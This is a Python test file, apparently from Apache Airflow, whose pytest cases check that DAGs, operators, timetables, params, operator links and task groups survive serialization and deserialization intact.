def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
"""Patch plugins manager to always and only return our custom timetable."""
from airflow import plugins_manager
monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
monkeypatch.setattr(
plugins_manager,
"timetable_classes",
{"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
)
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
self.backup_base_hook_get_connection = BaseHook.get_connection
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def teardown_method(self):
BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
"timetable, serialized_timetable",
[
(
cron_timetable("0 0 * * *"),
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "0 0 * * *", "timezone": "UTC"},
},
),
(
CustomSerializationTimetable("foo"),
CUSTOM_TIMETABLE_SERIALIZED,
),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
"""Verify a timetable-backed schedule_interval is excluded in serialization."""
dag = get_timetable_based_simple_dag(timetable)
serialized_dag = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(serialized_dag)
expected = copy.deepcopy(serialized_simple_dag_ground_truth)
del expected["dag"]["schedule_interval"]
expected["dag"]["timetable"] = serialized_timetable
self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
"""Verify serialization fails without timetable registration."""
dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
with pytest.raises(SerializationError) as ctx:
SerializedDAG.to_dict(dag)
message = (
"Failed to serialize DAG 'simple_dag': Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
"timetable",
[cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
"""Verify a timetable-backed serialization can be deserialized."""
dag = get_timetable_based_simple_dag(timetable)
roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually.
'timetable',
'timezone',
# Need to check fields in it, to exclude functions.
'default_args',
"_task_group",
'params',
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timetable.summary == dag.timetable.summary
assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_ext',
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
'params',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_ext) == set(task.template_ext)
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Ugly hack as some operators override params var in their init
if isinstance(task.params, ParamsDict):
assert serialized_task.params.dump() == task.params.dump()
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@pytest.mark.parametrize(
"dag_start_date, task_start_date, expected_task_start_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"dag_end_date, task_end_date, expected_task_end_date",
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
"serialized_timetable, expected_timetable",
[
({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
(
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "@weekly", "timezone": "UTC"},
},
cron_timetable("0 0 * * 0"),
),
({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
(
{
"__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
"__var": {"delta": 86400.0},
},
delta_timetable(timedelta(days=1)),
),
(CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
self,
serialized_timetable,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": serialized_timetable,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"timetable": CUSTOM_TIMETABLE_SERIALIZED,
},
}
SerializedDAG.validate_schema(serialized)
with pytest.raises(ValueError) as ctx:
SerializedDAG.from_dict(serialized)
message = (
"Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
@pytest.mark.parametrize(
"serialized_schedule_interval, expected_timetable",
[
(None, NullTimetable()),
("@weekly", cron_timetable("0 0 * * 0")),
("@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
delta_timetable(timedelta(days=1)),
),
],
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_timetable,
):
"""Test DAGs serialized before 2.2 can be correctly deserialized."""
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
"val, expected",
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
],
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
assert "params" in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params.dump()
assert expected_val == deserialized_simple_task.params.dump()
def test_invalid_params(self):
"""
Test to make sure that only native Param objects are being passed as dag or task params
"""
class S3Param(Param):
def __init__(self, path: str):
schema = {"type": "string", "pattern": r"s3:\/\/(.+?)\/(.+)"}
super().__init__(default=path, schema=schema)
dag = DAG(dag_id='simple_dag', params={'path': S3Param('s3://my_bucket/my_path')})
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
dag = DAG(dag_id='simple_dag')
BaseOperator(
task_id='simple_task',
dag=dag,
start_date=datetime(2019, 8, 1),
params={'path': S3Param('s3://my_bucket/my_path')},
)
with pytest.raises(SerializationError):
SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
"val, expected_val",
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
],
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params.dump()
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
XCom.set(
key='search_query',
value="dummy_value_1",
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with caplog.at_level("ERROR", logger="airflow.serialization.serialized_objects"):
SerializedDAG.from_dict(serialized_dag)
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' not registered"
)
assert expected_err_msg in caplog.text
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
XCom.set(
key='search_query',
value=["dummy_value_1", "dummy_value_2"],
task_id=simple_task.task_id,
dag_id=simple_task.dag_id,
execution_date=test_date,
)
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_1' == custom_inbuilt_link
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
assert 'https://console.cloud.google.com/bigquery?j=dummy_value_2' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f"{self.__class__.__name__}({str(self.__dict__)})"
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@pytest.mark.parametrize(
"templated_field, expected_field",
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
],
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
assert expected_field == getattr(deserialized_test_task, "bash_command")
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {
"is_subdag",
"tasks",
"has_on_success_callback",
"has_on_failure_callback",
"dag_dependencies",
"params",
}
keys_for_backwards_compat: set = {
"_concurrency",
}
dag_params: set = set(dag_schema.keys()) - ignored_keys - keys_for_backwards_compat
assert set(DAG.get_serialized_fields()) == dag_params
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
assert {
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'_pre_execute_hook': None,
'_post_execute_hook': None,
'depends_on_past': False,
'do_xcom_push': True,
'doc': None,
'doc_json': None,
'doc_md': None,
'doc_rst': None,
'doc_yaml': None,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_active_tis_per_dag': None,
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
} == fields, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
def test_deps_sorted(self):
"""
Tests serialize_operator, make sure the deps is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskSensor
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_deps_sorted", start_date=execution_date) as dag:
task1 = ExternalTaskSensor(
task_id="task1",
external_dag_id="external_dag_id",
mode="reschedule",
)
task2 = DummyOperator(task_id="task2")
task1 >> task2
serialize_op = SerializedBaseOperator.serialize_operator(dag.task_dict["task1"])
deps = serialize_op["deps"]
assert deps == [
'airflow.ti_deps.deps.not_in_retry_period_dep.NotInRetryPeriodDep',
'airflow.ti_deps.deps.not_previously_skipped_dep.NotPreviouslySkippedDep',
'airflow.ti_deps.deps.prev_dagrun_dep.PrevDagrunDep',
'airflow.ti_deps.deps.ready_to_reschedule.ReadyToRescheduleDep',
'airflow.ti_deps.deps.trigger_rule_dep.TriggerRuleDep',
]
def test_task_group_sorted(self):
"""
Tests serialize_task_group, make sure the list is in order
"""
from airflow.operators.dummy import DummyOperator
from airflow.serialization.serialized_objects import SerializedTaskGroup
from airflow.utils.task_group import TaskGroup
"""
start
╱ ╲
╱ ╲
task_group_up1 task_group_up2
(task_up1) (task_up2)
╲ ╱
task_group_middle
(task_middle)
╱ ╲
task_group_down1 task_group_down2
(task_down1) (task_down2)
╲ ╱
╲ ╱
end
"""
execution_date = datetime(2020, 1, 1)
with DAG(dag_id="test_task_group_sorted", start_date=execution_date) as dag:
start = DummyOperator(task_id="start")
with TaskGroup("task_group_up1") as task_group_up1:
_ = DummyOperator(task_id="task_up1")
with TaskGroup("task_group_up2") as task_group_up2:
_ = DummyOperator(task_id="task_up2")
with TaskGroup("task_group_middle") as task_group_middle:
_ = DummyOperator(task_id="task_middle")
with TaskGroup("task_group_down1") as task_group_down1:
_ = DummyOperator(task_id="task_down1")
with TaskGroup("task_group_down2") as task_group_down2:
_ = DummyOperator(task_id="task_down2")
end = DummyOperator(task_id='end')
start >> task_group_up1
start >> task_group_up2
task_group_up1 >> task_group_middle
task_group_up2 >> task_group_middle
task_group_middle >> task_group_down1
task_group_middle >> task_group_down2
task_group_down1 >> end
task_group_down2 >> end
task_group_middle_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_middle"]
)
upstream_group_ids = task_group_middle_dict["upstream_group_ids"]
assert upstream_group_ids == ['task_group_up1', 'task_group_up2']
upstream_task_ids = task_group_middle_dict["upstream_task_ids"]
assert upstream_task_ids == ['task_group_up1.task_up1', 'task_group_up2.task_up2']
downstream_group_ids = task_group_middle_dict["downstream_group_ids"]
assert downstream_group_ids == ['task_group_down1', 'task_group_down2']
task_group_down1_dict = SerializedTaskGroup.serialize_task_group(
dag.task_group.children["task_group_down1"]
)
downstream_task_ids = task_group_down1_dict["downstream_task_ids"]
assert downstream_task_ids == ['end']
def test_edge_info_serialization(self):
"""
Tests edge_info serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.edgemodifier import Label
with DAG("test_edge_info_serialization", start_date=datetime(2020, 1, 1)) as dag:
task1 = DummyOperator(task_id="task1")
task2 = DummyOperator(task_id="task2")
task1 >> Label("test label") >> task2
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.edge_info == dag.edge_info
@pytest.mark.parametrize(
"mode, expect_custom_deps",
[
("poke", False),
("reschedule", True),
],
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
